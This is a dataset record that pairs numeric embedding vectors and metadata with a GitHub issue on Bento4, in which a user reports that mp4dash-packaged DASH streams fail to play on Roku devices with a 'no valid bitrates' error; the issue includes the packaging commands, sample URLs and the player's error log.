0.022806623950600624, 0.028175262734293938, -0.003777557285502553, -0.01374452281743288, -0.01743798516690731, 0.0073465583845973015, 0.015298602171242237, 0.0005483007989823818, -0.027327582240104675, 0.005472916644066572, -0.02841745689511299, 0.009418664500117302, 0.003278031712397933, 0.00941193662583828, 0.010515266098082066, 0.0034647230058908463, 0.012917025946080685, -0.0005966555909253657, -0.0018652318976819515, 0.0026658184360712767, 0.01006451528519392, 0.005049076862633228, -0.005708383396267891, -0.009230291470885277, -0.00006885296170366928, -0.005372002720832825, -0.006260048132389784, 0.04211488366127014, 0.010898740030825138, 0.013731067068874836, 0.013630152679979801, 0.0012168578105047345, -0.0012092891847714782, 0.006811712868511677, -0.02586096152663231, -0.005193720571696758, 0.008786268532276154, -0.01233845017850399, -0.008308607153594494, -0.0034748143516480923, -0.013704156503081322, 0.00016314472304657102, -0.0005958146066404879, 0.004689149558544159, 0.002716275630518794, -0.0006429079221561551, 0.01374452281743288, -0.003106477437540889, -0.013246678747236729, 0.01404726505279541, 0.004120665602385998, 0.00040870276279747486, -0.002506037475541234, 0.019092978909611702, -0.020788338035345078, 0.01593099907040596, -0.01424909383058548, 0.0021006986498832703, 0.006007762625813484, -0.01132258027791977, -0.003311669686809182, 0.005223995074629784, -0.0004478070477489382, -0.004248490557074547, 0.011362945660948753, 0.002876056358218193, -0.0024454889353364706, 0.005338364280760288, 0.004157667513936758, -0.015285147354006767, -0.0008804769604466856, 0.00881990697234869, -0.004588235169649124, 0.0044805933721363544, 0.01519095990806818, 0.007043815683573484, 0.02530929632484913, 0.009943418204784393, -0.0013976625632494688, -0.02238951064646244, 0.028955666348338127, -0.014881489798426628, 0.007238916587084532, 0.018030015751719475, -0.011349490843713284, -0.012943935580551624, -0.0030223822686821222, -0.012136622332036495, -0.008012592792510986, -0.012681558728218079, -0.00029033873579464853, -0.016173193231225014, 0.002625452820211649, -0.011329308152198792, 0.008147144690155983, -0.024717265740036964, 0.04555942490696907, -0.006071674637496471, -0.015056408010423183, -0.005735293962061405, 0.012634465470910072, -0.0018215024610981345, 0.0003033734974451363, 0.010367258451879025, -0.019335173070430756, 0.006902535445988178, -0.010481627658009529, 0.001670971978455782, 0.00126731488853693, 0.019967569038271904, -0.006936173420399427, 0.010030877776443958, -0.011235121637582779, 0.001977919600903988, 0.010003967210650444, -0.01517750509083271, 0.012331723235547543, 0.0062196822836995125, 0.0028188717551529408, -0.016442297026515007, -0.017734000459313393, 0.009304295293986797, -0.002019967185333371, -0.010151974856853485, -0.0019745556637644768, -0.0003973499115090817, -0.0024942641612142324, 0.017397617921233177, -0.0039020180702209473, -0.019510090351104736, -0.006155769806355238, 0.0070841810666024685, 0.012405727058649063, 0.002506037475541234, -0.00970122404396534, 0.0012706787092611194, -0.004504140000790358, 0.011161117814481258, 0.0012614282313734293, -0.011383128352463245, 0.003451267722994089, -0.0010284845484420657, -0.0018215024610981345, 0.0059203035198152065, 0.003854924812912941, 0.0027515955734997988, -0.001426254864782095, 0.01183387916535139, 0.005520010367035866, -0.002376530785113573, 0.015648437663912773, 0.005546920467168093, -0.011988614685833454, 0.016953596845269203, 0.006381145212799311, 0.0032057096250355244, -0.002149473875761032, 0.005550284404307604, -0.014302914962172508, 0.024636534973978996, -0.004618509206920862, 0.01854131370782852, 0.00910919439047575, -0.014343280345201492, 0.010609452612698078, 0.01575607992708683, -0.01917370967566967, 0.015164049342274666, 0.06555390357971191, -0.018258754163980484, -0.007238916587084532, -0.002374849049374461, 0.009237018413841724, -0.01103329285979271, 0.00125806441064924, -0.01175987534224987, -0.00968776922672987, 0.0023227098863571882, 0.0037069171667099, 0.021017076447606087, 0.001194993034005165, -0.003935656044632196, 0.008766085840761662, 0.006865533534437418, 0.02319682575762272, -0.011369673535227776, -0.008685354143381119, -0.030166637152433395, 0.00623313756659627, -0.003969294484704733, 0.015433154068887234, -0.015217870473861694, 0.010582542046904564, -0.0010789416264742613, -0.0012824521400034428, 0.010501811280846596, -0.00004546397758531384, -0.007857857272028923, -0.004389770328998566, -0.0014666205970570445, -0.008032775484025478, 0.014356736093759537, -0.007770398166030645, 0.009815594181418419, -0.016778677701950073, -0.003572364803403616, 0.01459893025457859, 0.025618767365813255, 0.03258857876062393, -0.0009511169046163559, 0.007427289616316557, 0.031269967555999756, -0.0009561626357026398, -0.013428324833512306, -0.009021734818816185, 0.0014069130411371589, 0.00017554877558723092, 0.0013816844439134002, -0.027825426310300827, 0.023452473804354668, -0.009364843368530273, -0.015661893412470818, 0.005314817652106285, 0.0178416408598423, 0.001311044441536069, 0.00826824177056551, -0.005250905640423298, -0.006737709045410156, -0.018958425149321556, -0.0044805933721363544, 0.032158009707927704 ]
93
null
null
null
null
null
null
null
null
null
[ "axiomatic-systems", "Bento4" ]
Hi team, I am trying to play **mpd** files packaged with **mp4dash** in Roku Devices but its returning error in each time that **"no valid bitrate"**. Its happening for both DRM and Non-DRM case. Here I am sharing my packaging sample. Could you please let me know if I am missing anything. **DRM** (I tried to play with a playready license) mp4dash --encryption-key=85103338500873418126725887739470:11803214573775119659785952397166 --use-segment-list --marlin --widevine --widevine-header=https://xxxx.com --playready --playready-header=https://xxxx.com Big_Buck_Bunny_Short_Film-1590568447755_480.mf4 Big_Buck_Bunny_Short_Film-1590568447755_360.mf4 Big_Buck_Bunny_Short_Film-1590568447755_240.mf4 Big_Buck_Bunny_Short_Film-1590568447755_144.mf4 DRM Sample URL: https://stagingstudio.s3.amazonaws.com/encoding-test/video-packaging/feb0820210247/stream.mpd Key used: 85103338500873418126725887739470:11803214573775119659785952397166 **Non-DRM** mp4dash Big_Buck_Bunny_Short_Film-1590568447755_480.mf4 Big_Buck_Bunny_Short_Film-1590568447755_360.mf4 Big_Buck_Bunny_Short_Film-1590568447755_240.mf4 Big_Buck_Bunny_Short_Film-1590568447755_144.mf4 Non-DRM sample URL: https://pallycon-wm-bucket-1.s3-us-west-2.amazonaws.com/encoding-test/video-drm/21_feb_15/stream.mpd **Exact Error Message** ------ Running dev 'Video Example' main ------ player state-----------------buffering errorcode----------------- 0 errorMsg----------------- errorStr----------------- player state-----------------error errorcode------------------5 errorMsg-----------------no valid bitrates errorStr-----------------buffer:search:demux:Errors seen on all bitrates:extra:lasterror:970:retry:1 player state-----------------finished errorcode------------------5 errorMsg-----------------no valid bitrates errorStr-----------------buffer:search:demux:Errors seen on all bitrates:extra:lasterror:970:retry:1 Appreciate your help here. Thank You
Roku devices unable to play mpd packaged with Bento4
https://api.github.com/repos/axiomatic-systems/Bento4/issues/579/comments
0
2021-02-15T10:13:53
2021-02-15T10:13:53Z
https://github.com/axiomatic-systems/Bento4/issues/579
808,394,728
579
false
This is a GitHub Issue repo:Bento4 owner:axiomatic-systems Title : Roku devices unable to play mpd packaged with Bento4 Issue date: --- start body --- Hi team, I am trying to play **mpd** files packaged with **mp4dash** in Roku Devices but its returning error in each time that **"no valid bitrate"**. Its happening for both DRM and Non-DRM case. Here I am sharing my packaging sample. Could you please let me know if I am missing anything. **DRM** (I tried to play with a playready license) mp4dash --encryption-key=85103338500873418126725887739470:11803214573775119659785952397166 --use-segment-list --marlin --widevine --widevine-header=https://xxxx.com --playready --playready-header=https://xxxx.com Big_Buck_Bunny_Short_Film-1590568447755_480.mf4 Big_Buck_Bunny_Short_Film-1590568447755_360.mf4 Big_Buck_Bunny_Short_Film-1590568447755_240.mf4 Big_Buck_Bunny_Short_Film-1590568447755_144.mf4 DRM Sample URL: https://stagingstudio.s3.amazonaws.com/encoding-test/video-packaging/feb0820210247/stream.mpd Key used: 85103338500873418126725887739470:11803214573775119659785952397166 **Non-DRM** mp4dash Big_Buck_Bunny_Short_Film-1590568447755_480.mf4 Big_Buck_Bunny_Short_Film-1590568447755_360.mf4 Big_Buck_Bunny_Short_Film-1590568447755_240.mf4 Big_Buck_Bunny_Short_Film-1590568447755_144.mf4 Non-DRM sample URL: https://pallycon-wm-bucket-1.s3-us-west-2.amazonaws.com/encoding-test/video-drm/21_feb_15/stream.mpd **Exact Error Message** ------ Running dev 'Video Example' main ------ player state-----------------buffering errorcode----------------- 0 errorMsg----------------- errorStr----------------- player state-----------------error errorcode------------------5 errorMsg-----------------no valid bitrates errorStr-----------------buffer:search:demux:Errors seen on all bitrates:extra:lasterror:970:retry:1 player state-----------------finished errorcode------------------5 errorMsg-----------------no valid bitrates errorStr-----------------buffer:search:demux:Errors seen on all bitrates:extra:lasterror:970:retry:1 Appreciate your help here. Thank You --- end body ---
2,123
[ -0.009104312397539616, -0.0027158178854733706, -0.017423508688807487, 0.0018750277813524008, -0.013958435505628586, -0.00894577894359827, -0.033035214990377426, 0.03856121748685837, -0.022602247074246407, 0.03182734549045563, 0.025818198919296265, -0.010508459992706776, -0.0017410297878086567, 0.005227807909250259, 0.0057713487185537815, -0.003944446798413992, -0.02370442822575569, 0.003663240000605583, -0.02820373885333538, 0.024414051324129105, 0.04127892106771469, -0.00808517262339592, 0.0298947561532259, 0.06105777621269226, 0.0026799591723829508, 0.014434034004807472, -0.05211954563856125, 0.01600426249206066, -0.019008837640285492, -0.009383631870150566, 0.019265510141849518, 0.012154181487858295, -0.004857897758483887, 0.024821706116199493, 0.005669435020536184, 0.026467427611351013, 0.05834006890654564, 0.06830498576164246, 0.0000919466619961895, -0.017227230593562126, -0.05468626692891121, -0.017438607290387154, -0.017181934788823128, 0.03342777118086815, -0.019069230183959007, 0.025002887472510338, -0.008100271224975586, 0.008356942795217037, -0.04532528296113014, -0.0456574447453022, 0.012456148862838745, -0.019507084041833878, -0.029381411150097847, -0.01665349304676056, 0.013588525354862213, -0.04532528296113014, 0.05148541182279587, 0.0298947561532259, -0.019205115735530853, 0.03463564068078995, -0.014517074450850487, -0.018797460943460464, 0.039738889783620834, 0.027977263554930687, 0.015377681702375412, 0.01612504944205284, -0.020714951679110527, 0.0444495752453804, -0.05082108452916145, 0.029305920004844666, -0.028913361951708794, 0.00011223508772673085, 0.01339979562908411, 0.054625872522592545, 0.01201829593628645, -0.05797770991921425, 0.04716728255152702, 0.016034459695219994, 0.006767840590327978, 0.019793951883912086, -0.035571739077568054, 0.005854389630258083, -0.06709711998701096, 0.019401395693421364, 0.028958657756447792, 0.024942493066191673, -0.04481193795800209, -0.06661397218704224, -0.03907455876469612, -0.02885296940803528, 0.015392779372632504, 0.031555574387311935, 0.02965318225324154, 0.004918291233479977, 0.02210400067269802, 0.049281053245067596, -0.05091167613863945, -0.020428083837032318, -0.04819396883249283, -0.05381056293845177, -0.019869444891810417, 0.004559705033898354, 0.013867844827473164, -0.015581509098410606, 0.046804919838905334, -0.027433723211288452, 0.0011512500932440162, -0.03197833150625229, 0.006764065939933062, 0.09795816987752914, -0.0026969448663294315, 0.005635463632643223, 0.006945246364921331, -0.011701229959726334, -0.01512855850160122, 0.03502820059657097, 0.0026799591723829508, -0.04629157856106758, -0.011889959685504436, -0.000735573295969516, -0.01117278728634119, -0.035481151193380356, -0.028717083856463432, 0.016396820545196533, 0.012033394537866116, 0.04605000466108322, -0.014381189830601215, 0.02174164168536663, 0.007084906101226807, -0.02595408447086811, -0.0054580578580498695, 0.0001989916927414015, -0.02239087037742138, -0.03940672427415848, -0.016306230798363686, -0.003010235959663987, -0.022813623771071434, 0.01500777155160904, 0.01668369024991989, -0.003729295451194048, -0.005235356744378805, -0.012773213908076286, 0.047439053654670715, 0.031102625653147697, -0.023900706321001053, -0.0028101825155317783, -0.0012257982743903995, -0.006401705555617809, -0.006930148229002953, 0.00826635304838419, -0.012788312509655952, -0.003527354681864381, -0.00039468062459491193, -0.01047071348875761, 0.027463920414447784, 0.03641724959015846, -0.02162085473537445, 0.0029215330723673105, -0.016351526603102684, -0.004469115287065506, 0.018435100093483925, -0.0060921888798475266, 0.0434228889644146, -0.01339979562908411, 0.01941649243235588, -0.0051674144342541695, -0.011633288115262985, 0.0034612994641065598, -0.02587859146296978, 0.016230739653110504, -0.0068546561524271965, -0.01949198544025421, -0.00340090598911047, 0.015377681702375412, -0.04825436323881149, -0.030604379251599312, 0.01849549263715744, 0.03146498650312424, -0.022964607924222946, -0.003733069868758321, -0.019884541630744934, -0.029909854754805565, 0.006945246364921331, -0.030226919800043106, 0.01704605109989643, -0.02639193646609783, 0.030755363404750824, -0.053146231919527054, 0.04112793877720833, 0.002947955159470439, 0.02202850952744484, 0.06353390961885452, 0.006454549729824066, -0.0032291621901094913, 0.03391091898083687, -0.016502508893609047, -0.020277099683880806, -0.0630507618188858, -0.0015419202391058207, 0.016140148043632507, 0.003789688693359494, -0.019039034843444824, 0.0075189839117228985, 0.002910209121182561, -0.016517607495188713, 0.016306230798363686, 0.003504707245156169, 0.03297482058405876, 0.03822905197739601, 0.0011238843435421586, -0.019069230183959007, -0.02374972216784954, 0.0317065604031086, 0.02732803486287594, 0.02239087037742138, 0.014479328878223896, -0.02711665816605091, 0.011973001062870026, -0.03735334798693657, 0.004310582298785448, 0.03665882349014282, -0.019431591033935547, -0.006896176841109991, 0.005643012467771769, -0.0169705580919981, -0.01199564803391695, -0.01740841194987297, -0.006118610966950655, 0.010621697641909122, -0.0024610329419374466, 0.05323682352900505, 0.030589280650019646, -0.04372485727071762, -0.006564012728631496, 0.01175407413393259, 0.01949198544025421, -0.02254185453057289, 0.005348594859242439, -0.05221013352274895, 0.004959811922162771, -0.0420338399708271, 0.00866645947098732, -0.01564190350472927, -0.01832941174507141, -0.007349127437919378, 0.026663707569241524, 0.022043608129024506, 0.04550646245479584, -0.006496069952845573, -0.011927706189453602, -0.005994049366563559, 0.0105537548661232, 0.026980772614479065, -0.0037066477816551924, -0.01737821474671364, 0.01689506694674492, 0.04825436323881149, 0.0006393212242983282, 0.014501976780593395, -0.0434228889644146, -0.011867312714457512, 0.006107287481427193, -0.006341312080621719, -0.0316159687936306, 0.023100493475794792, -0.037896886467933655, -0.029834363609552383, 0.01195790246129036, -0.04019184038043022, -0.009323238395154476, 0.0028894490096718073, -0.027750788256525993, -0.024127181619405746, 0.014169812202453613, -0.0061488077044487, -0.013596074655652046, 0.029698478057980537, 0.0010691527277231216, 0.03318619728088379, 0.000018740251107374206, 0.028173543512821198, 0.04073537886142731, 0.006714996416121721, -0.015219148248434067, -0.01660819724202156, -0.01199564803391695, -0.01275811530649662, -0.04073537886142731, -0.038893379271030426, 0.004827701020985842, 0.016547804698348045, 0.0315253809094429, -0.01752919703722, 0.00798703357577324, 0.012501443736255169, 0.0022137972991913557, -0.007696389686316252, 0.021696345880627632, 0.0422150194644928, 0.008492828346788883, -0.022964607924222946, 0.022239886224269867, -0.016381721943616867, -0.014547271654009819, -0.05628669261932373, -0.009323238395154476, -0.04176206886768341, 0.032672856003046036, 0.010961410589516163, -0.030000444501638412, 0.03934632986783981, -0.00014779881166759878, -0.03209911659359932, -0.013709312304854393, -0.03237088769674301, 0.017665082588791847, -0.008341845124959946, -0.01272036973387003, -0.01825391873717308, 0.008621164597570896, -0.004235090687870979, 0.009640304371714592, -0.06709711998701096, 0.030634576454758644, 0.006839558016508818, -0.02270793542265892, -0.023764820769429207, 0.023779919371008873, -0.05873262882232666, 0.04064479097723961, 0.009655402041971684, 0.009806386195123196, 0.007688840851187706, -0.002970602596178651, -0.0016636507352814078, -0.019990229979157448, -0.030876150354743004, -0.018555887043476105, 0.03943692147731781, 0.019069230183959007, -0.018027443438768387, 0.009579910896718502, -0.013445091433823109, -0.03696078807115555, 0.011942803859710693, 0.006514943204820156, -0.017499001696705818, 0.015657000243663788, 0.024323461577296257, -0.012546738609671593, 0.0010616035433486104, 0.007183045614510775, 0.009240197017788887, 0.01737821474671364, 0.03587370738387108, -0.023900706321001053, -0.012531640008091927, -0.009595008566975594, 0.027010969817638397, -0.0005138161359354854, -0.015626804903149605, -0.017121542245149612, -0.008160664699971676, 0.03614547848701477, 0.024459345266222954, 0.02498778887093067, -0.01424530427902937, 0.004846574272960424, -0.007677516900002956, -0.01849549263715744, -0.0038765042554587126, 0.014434034004807472, -0.05006616562604904, 0.028943559154868126, -0.06401704996824265, 0.004431369248777628, 0.016744082793593407, -0.017076246440410614, -0.06359429657459259, 0.018601180985569954, -0.03702118247747421, 0.006949021015316248, -0.008009680546820164, -0.04408721625804901, -0.0010295194806531072, 0.024565033614635468, 0.01692526414990425, 0.016260934993624687, -0.020730050280690193, -0.024972690269351006, -0.00445401668548584, 0.018223723396658897, -0.015309738926589489, -0.03563213348388672, -0.02331187017261982, 0.030377903953194618, -0.015196501277387142, -0.02912474051117897, 0.015747591853141785, -0.041701674461364746, 0.005492029245942831, -0.011973001062870026, 0.00357076246291399, 0.0010389559902250767, -0.013528131879866123, 0.04287934675812721, 0.012108885683119297, -0.020563969388604164, 0.050972070544958115, -0.013414894230663776, 0.003565100720152259, 0.0005024923593737185, -0.002923420397564769, 0.016955459490418434, 0.02924552746117115, 0.013150673359632492, 0.0033933566883206367, 0.04052400216460228, -0.0034160043578594923, 0.02535014972090721, 0.003517918288707733, -0.016819575801491737, 0.005208934657275677, -0.01941649243235588, 0.008613615296781063, 0.026769395917654037, -0.026452329009771347, -0.014411386102437973, 0.010629246942698956, -0.030604379251599312, 0.01141436118632555, -0.02716195210814476, 0.020609263330698013, -0.0016976220067590475, 0.016864869743585587, 0.02503308281302452, -0.015626804903149605, 0.015657000243663788, -0.024051690474152565, 0.028460411354899406, -0.026859985664486885, 0.0007700164569541812, -0.012894000858068466, 0.0017702828627079725, 0.0011899396777153015, -0.01728762499988079, -0.04982459545135498, -0.05091167613863945, -0.02350814826786518, -0.023719526827335358, 0.02002042718231678, 0.05118344724178314, 0.0069225989282131195, 0.02338736318051815, -0.016638394445180893, 0.019084328785538673, -0.022360673174262047, -0.0039180247113108635, 0.046200986951589584, -0.006548914592713118, -0.011844664812088013, 0.0064734225161373615, -0.010636796243488789, 0.012946845032274723, 0.03732315078377724, 0.0045899017713963985, -0.013226164504885674, -0.0478920042514801, 0.0181784275919199, -0.0054807052947580814, -0.013958435505628586, -0.022254984825849533, 0.01370176300406456, 0.013490386307239532, 0.004250188823789358, 0.030498690903186798, -0.019069230183959007, -0.05957813560962677, -0.006428127642720938, -0.01061414834111929, 0.0068244594149291515, -0.027569608762860298, -0.0005326890968717635, 0.0014919068198651075, -0.00044398620957508683, -0.01769527979195118, 0.0023515699431300163, 0.010440517216920853, -0.036326657980680466, -0.01330165658146143, 0.026542920619249344, -0.02086593583226204, -0.012946845032274723, 0.007047160528600216, -0.007836049422621727, -0.019507084041833878, 0.007579377386718988, -0.014751099050045013, 0.00550712738186121, -0.002766774734482169, -0.018102936446666718, 0.0060921888798475266, 0.01740841194987297, -0.001453217351809144, 0.007062258664518595, -0.01281850878149271, -0.010885918512940407, 0.05015675723552704, -0.0456574447453022, -0.013467738404870033, 0.00398219283670187, -0.01263732835650444, -0.006745193153619766, -0.016547804698348045, -0.046925708651542664, -0.0386820025742054, -0.032763443887233734, -0.019129624590277672, 0.033397577702999115, -0.002155291149392724, -0.013029886409640312, 0.005582619458436966, 0.0068471068516373634, 0.03599449247121811, -0.019763754680752754, 0.003081953153014183, 0.00952706579118967, -0.00030267497641034424, 0.006288467440754175, -0.00007696625834796578, -0.010002664290368557, 0.01067454181611538, 0.0257578045129776, 0.03004574030637741, -0.03016652725636959, 0.025772903114557266, -0.04121852666139603, 0.006262045353651047, 0.0050994716584682465, -0.0043672011233866215, 0.00029842855292372406, 0.05067010223865509, -0.020971624180674553, 0.012652426958084106, -0.06915049999952316, 0.007149074226617813, -0.0010851947590708733, 0.008455082774162292, 0.014328345656394958, 0.005843066144734621, 0.03382033109664917, -0.018284115940332413, 0.014501976780593395, -0.00014650129014626145, 0.007417070213705301, 0.018435100093483925, 0.000029783877835143358, 0.011119943112134933, 0.01653270609676838, 0.02672410011291504, -0.008092721924185753, 0.0211075097322464, 0.005601492244750261, -0.010568853467702866, 0.0019703363068401814, 0.009474221616983414, -0.008439984172582626, 0.0026176783721894026, -0.0187370665371418, 0.00814556609839201, -0.0006242229137569666, 0.0009776189690455794, 0.033759936690330505, 0.001525878207758069, 0.01704605109989643, 0.023236379027366638, 0.017197033390402794, -0.000278376042842865, -0.034967806190252304, -0.011791820637881756, 0.031314000487327576, -0.02038278803229332, 0.007364226039499044, 0.0016806364292278886, 0.014871886000037193, 0.002051489893347025, 0.01125582866370678, 0.00462387315928936, -0.019748657941818237, -0.022964607924222946, 0.009043918922543526, 0.040101248770952225, -0.015868378803133965, 0.009836582466959953, -0.005258004646748304, -0.028052756562829018, 0.0027818731032311916, 0.026784494519233704, 0.05248190462589264, -0.00784359872341156, -0.010176295414566994, 0.03735334798693657, -0.004880545195192099, -0.012327812612056732, -0.031223412603139877, 0.017121542245149612, 0.013090279884636402, 0.02423286996781826, -0.037051379680633545, 0.014154714532196522, -0.0010200830874964595, 0.0053599183447659016, 0.0656476765871048, 0.02038278803229332, -0.0009148663375526667, -0.00009336213406641036, 0.027010969817638397, 0.014622763730585575, 0.0064356764778494835, 0.023961100727319717, 0.0023100492544472218, -0.027856476604938507, 0.02507837861776352, -0.01129357423633337, 0.005363692995160818, 0.032672856003046036, 0.02094142697751522, -0.035148985683918, -0.0012352346675470471, -0.040916558355093, -0.03442426398396492, 0.023342067375779152, 0.004235090687870979, -0.024610329419374466, -0.01025178749114275, -0.03164616599678993, -0.0013192193582654, -0.01382254995405674, -0.007820951752364635, -0.040342822670936584, -0.00985168106853962, -0.012252320535480976, -0.030393002554774284, 0.044147610664367676, -0.03149518370628357, 0.03249167278409004, -0.005726053845137358, 0.015581509098410606, 0.022239886224269867, 0.00958745926618576, -0.041580889374017715, 0.002991362940520048, 0.011965451762080193, 0.024096984416246414, -0.0008087059832178056, -0.026301346719264984, 0.0006581941852346063, 0.007605799473822117, 0.007364226039499044, -0.02747901901602745, -0.025184066966176033, 0.01422265637665987, 0.028626494109630585, -0.008515476249158382, 0.022617345675826073, -0.016260934993624687, -0.029472002759575844, -0.000238388980505988, 0.0170158538967371, 0.031676363199949265, 0.01893334649503231, -0.012342910282313824, 0.02006572298705578, -0.0033386251889169216, 0.01885785348713398, -0.0032593589276075363, -0.008251254446804523, 0.01366401743143797, 0.006333762779831886, -0.01492473017424345, 0.021696345880627632, -0.026950575411319733, -0.0021458547562360764, 0.0074887871742248535, -0.010901017114520073, -0.011308672837913036, 0.002880012383684516, -0.0010757582494989038, -0.02242106758058071, -0.02912474051117897, 0.02997024729847908, -0.020005328580737114, 0.018676673993468285, 0.03708157688379288, 0.0021345308050513268, 0.011512501165270805, 0.018314313143491745, -0.034363869577646255, -0.012448599562048912, -0.03336738049983978, -0.01881255954504013, 0.00030338269425556064, 0.0022968382108956575, -0.01869177259504795, -0.020080821588635445, 0.004216217435896397, 0.002074137330055237, -0.010629246942698956, 0.010395222343504429, 0.009413828141987324, -0.006341312080621719, 0.04384564235806465, 0.011686132289469242, 0.007409520912915468, 0.0053825657814741135, 0.03052888810634613, -0.009572361595928669, -0.012607132084667683, -0.03714197129011154, -0.000288992072455585, -0.0017278187442570925, -0.014094321057200432, 0.01269772183150053, -0.019280608743429184, -0.013452640734612942, 0.020367689430713654, 0.017755674198269844, -0.006564012728631496, 0.00662063155323267, 0.010297082364559174, -0.03072516620159149, -0.01777077093720436, 0.0012965718051418662, 0.028309429064393044, -0.017680181190371513, 0.025335051119327545, 0.01725742779672146, -0.0064432257786393166, 0.02941160835325718, 0.025063280016183853, 0.00814556609839201, -0.017468804493546486, 0.008470181375741959, 0.001114447833970189, 0.0038217727560549974, -0.016079755499958992, -0.0013843310298398137, 0.029758870601654053, -0.010244238190352917, -0.025002887472510338, 0.0222700834274292, 0.00514476653188467, -0.02082064002752304, -0.03209911659359932, -0.018269017338752747, 0.017106443643569946, 0.031072428449988365, 0.0022364447358995676, 0.012735468335449696, 0.010916115716099739, 0.0269656740128994, 0.005563746206462383, -0.01195790246129036, -0.0037443935871124268, 0.01604955829679966, -0.030740264803171158, 0.005982725881040096, -0.010583951137959957, 0.01684977114200592, -0.02186242863535881, -0.024459345266222954, -0.002579932566732168, -0.04762023314833641, -0.006665926892310381, -0.004438918549567461, 0.0017514099599793553, -0.03611528128385544, -0.005258004646748304, -0.006718771066516638, 0.02122829668223858, -0.025531329214572906, 0.00026870364672504365, -0.043513476848602295, 0.014713353477418423, 0.002300612861290574, -0.04626138135790825, 0.011421910487115383, 0.02960788644850254, 0.002657311735674739, -0.006752742454409599, -0.020881034433841705, -0.010266886092722416, 0.02953239530324936, -0.0445401668548584, 0.025455838069319725, -0.008772147819399834, -0.009632755070924759, 0.01143700908869505, -0.02522936277091503, 0.008077623322606087, 0.008953328244388103, 0.009504418820142746, -0.0014551045605912805, -0.008455082774162292, -0.020714951679110527, -0.004050135612487793, -0.014486878179013729, -0.01321861520409584, -0.01588347740471363, 0.03345796838402748, -0.015898574143648148, -0.009451574645936489, 0.0017419734504073858, -0.031917937099933624, -0.0025138771161437035, -0.006582885514944792, -0.009051468223333359, 0.02098672278225422, -0.002125094411894679, 0.043271902948617935, -0.030604379251599312, 0.030362805351614952, -0.011218083091080189, 0.007028287276625633, 0.02210400067269802, -0.030121231451630592, -0.013716861605644226, 0.023402459919452667, 0.01494737807661295, 0.02418757602572441, -0.017468804493546486, 0.009255295619368553, -0.028792575001716614, 0.01612504944205284, -0.05417292192578316, 0.023175984621047974, -0.0021099960431456566, 0.022134197875857353, -0.03185754269361496, 0.02832452580332756, -0.014977574348449707, 0.004631422460079193, -0.03774590417742729, -0.01147475466132164, 0.0006044062902219594, -0.02062436193227768, 0.011421910487115383, -0.02018650993704796, 0.015339935198426247, 0.006080865394324064, 0.02592388726770878, 0.004906967747956514, 0.01897864043712616, 0.01893334649503231, -0.010961410589516163, -0.01424530427902937, 0.01067454181611538, 0.000373920367565006, 0.01922021433711052, -0.005416537169367075, 0.0020911230240017176, -0.00019120659271720797, -0.04179226607084274, 0.000284509762423113, 0.009821483865380287, 0.013414894230663776, -0.005707180593162775, -0.0420338399708271, -0.02314578928053379, -0.00239686481654644, 0.00645077507942915, -0.017574492841959, -0.0039180247113108635, -0.0007247213507071137, -0.03822905197739601, 0.004004840273410082, -0.013445091433823109, 0.034726232290267944, -0.008417336270213127, -0.012863804586231709, -0.0067565166391432285, 0.011527598835527897, -0.011369066312909126, 0.018993739038705826, 0.036809805780649185, -0.016819575801491737, -0.002670522779226303, 0.002832830185070634, -0.051455218344926834, -0.016351526603102684, 0.012614681385457516, -0.018389804288744926, -0.0037991253193467855, -0.011346418410539627, 0.005914783105254173, 0.03294462338089943, -0.007813402451574802, -0.046080198138952255, -0.02423286996781826, -0.02242106758058071, -0.015596607699990273, -0.017106443643569946, 0.012856255285441875, -0.0049862340092659, 0.007620898075401783, -0.020850837230682373, 0.026935476809740067, 0.042305611073970795, -0.015030419453978539, -0.010448066517710686, 0.006696123629808426, -0.04088636487722397, 0.02435365691781044, 0.00812291819602251, -0.020971624180674553, -0.040916558355093, -0.019008837640285492, -0.01946178823709488, 0.012894000858068466, 0.03306541219353676, -0.048526134341955185, 0.010236688889563084, -0.001743860775604844, 0.036085084080696106, 0.030000444501638412, -0.018601180985569954, -0.015309738926589489, 0.01131622213870287, 0.0016806364292278886, -0.012592033483088017, 0.02101691998541355, -0.0140414759516716, -0.026618411764502525, -0.010946311987936497, -0.034484658390283585, -0.00842488557100296, -0.020111016929149628, -0.011467205360531807, 0.01189750898629427, -0.05344820022583008, 0.02852080576121807, -0.0075567299500107765, -0.015521115623414516, -0.02968337945640087, 0.010946311987936497, 0.008213508874177933, -0.003963320050388575, -0.001573060522787273, -0.0443589873611927, -0.016502508893609047, -0.008236155845224857, -0.02699587121605873, -0.008953328244388103, -0.0013173320330679417, -0.0033140904270112514, 0.013973534107208252, -0.02391580492258072, -0.004956037271767855, 0.014939828775823116, 0.012425951659679413, 0.0005010768654756248, 0.011421910487115383, 0.005752475932240486, -0.01516630407422781, 0.0033574982080608606, 0.011671033687889576, -0.003844420425593853, 0.026059772819280624, -0.022360673174262047, -0.02539544366300106, 0.007277410477399826, -0.035330165177583694, -0.019627870991826057, 0.030876150354743004, -0.0022232336923480034, 0.027056263759732246, 0.01684977114200592, -0.00008711047121323645, -0.00856832042336464, -0.025289755314588547, -0.008651360869407654, -0.01781606674194336, 0.02885296940803528, -0.01624583639204502, 0.02098672278225422, -0.002940405858680606, 0.023447755724191666, -0.0057336026802659035, -0.019869444891810417, -0.004597451072186232, 0.007054709363728762, -0.012607132084667683, -0.006194103043526411, -0.03982947766780853, 0.04605000466108322, -0.0140414759516716, -0.002245881361886859, -0.008236155845224857, 0.0007421788177452981, -0.037172164767980576, -0.02852080576121807, -0.0043672011233866215, -0.027177050709724426, 0.012652426958084106, 0.026618411764502525, 0.017921755090355873, 0.027297837659716606, -0.003055530833080411, -0.01953727938234806, -0.01808783784508705, -0.029109641909599304, -0.006077090743929148, -0.007658644113689661, -0.011822016909718513, -0.009934722445905209, 0.011286024935543537, 0.010161197744309902, -0.003557551419362426, -0.003010235959663987, 0.009995114989578724, 0.01137661561369896, 0.023493051528930664, -0.005461832508444786, -0.014758648350834846, 0.0003894905385095626, 0.027901772409677505, -0.025123674422502518, -0.0023572316858917475, 0.017876461148262024, 0.009043918922543526, 0.0023930903989821672, 0.00003762794949579984, 0.0012512766988947988, 0.004612549673765898, 0.0021288690622895956, -0.020805543288588524, 0.023613838478922844, -0.037896886467933655, -0.011520049534738064, -0.002319485880434513, 0.015460722148418427, 0.005695857107639313, -0.034363869577646255, -0.009927173145115376, -0.014169812202453613, -0.019280608743429184, 0.03312580659985542, -0.0019401394529268146, -0.026859985664486885, 0.0006015753606334329, -0.0026893955655395985, 0.007534082513302565, 0.03599449247121811, 0.002772436710074544, 0.012946845032274723, 0.0017712265253067017, -0.0065413652919232845, -0.007103779353201389, 0.02423286996781826, 0.013792353682219982, 